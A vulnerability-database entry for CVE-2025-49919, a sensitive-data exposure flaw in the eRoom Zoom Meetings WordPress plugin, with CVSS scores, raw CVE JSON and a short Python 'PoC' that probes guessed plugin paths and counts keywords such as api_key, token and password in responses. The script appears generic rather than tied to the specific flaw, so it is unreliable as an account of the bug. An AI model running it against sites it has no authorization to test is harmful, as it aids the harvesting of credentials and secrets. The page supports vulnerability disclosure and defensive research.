Security Vulnerability Report
中文
CVE-2025-49919 CVSS 5.8 MEDIUM

CVE-2025-49919

Published: 2025-12-18 08:15:52
Last Modified: 2026-04-29 10:16:49

Description

Insertion of Sensitive Information Into Sent Data vulnerability in DigitalME eRoom eroom-zoom-meetings-webinar allows Retrieve Embedded Sensitive Data.This issue affects eRoom: from n/a through <= 1.5.6.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

eroom-zoom-meetings-webinar <= 1.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-49919 PoC - eRoom WordPress Plugin Sensitive Information Exposure Note: This is a demonstration code for authorized security testing only. """ import requests import sys import re def test_vulnerability(target_url): """ Test for CVE-2025-49919 sensitive information disclosure vulnerability """ # Common WordPress plugin paths paths = [ '/wp-content/plugins/eroom-zoom-meetings-webinar/', '/wp-content/plugins/eroom-zoom-meetings-webinar/includes/', '/wp-json/wp/v2/eroom/', '/?rest_route=/eroom/v1/', ] print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2025-49919 - eRoom Plugin Information Disclosure") print("=" * 70) for path in paths: url = target_url.rstrip('/') + path try: print(f"\n[*] Testing endpoint: {url}") response = requests.get(url, timeout=10, verify=False) # Check for sensitive data patterns sensitive_patterns = [ r'api[_-]?key', r'secret', r'token', r'password', r'zoom', r'email', r'@.*\..*', ] content = response.text for pattern in sensitive_patterns: matches = re.findall(pattern, content, re.IGNORECASE) if matches and len(matches) > 2: print(f"[!] Potential sensitive data found (pattern: {pattern})") print(f"[!] Match count: {len(matches)}") if response.status_code == 200 and len(content) > 100: print(f"[+] Endpoint accessible - Status: {response.status_code}") print(f"[+] Response length: {len(content)} bytes") else: print(f"[-] Endpoint response - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] Testing complete. Review results above.") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) test_vulnerability(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49919", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:52.227", "lastModified": "2026-04-29T10:16:48.953", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in DigitalME eRoom eroom-zoom-meetings-webinar allows Retrieve Embedded Sensitive Data.This issue affects eRoom: from n/a through <= 1.5.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/eroom-zoom-meetings-webinar/vulnerability/wordpress-eroom-plugin-1-5-6-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}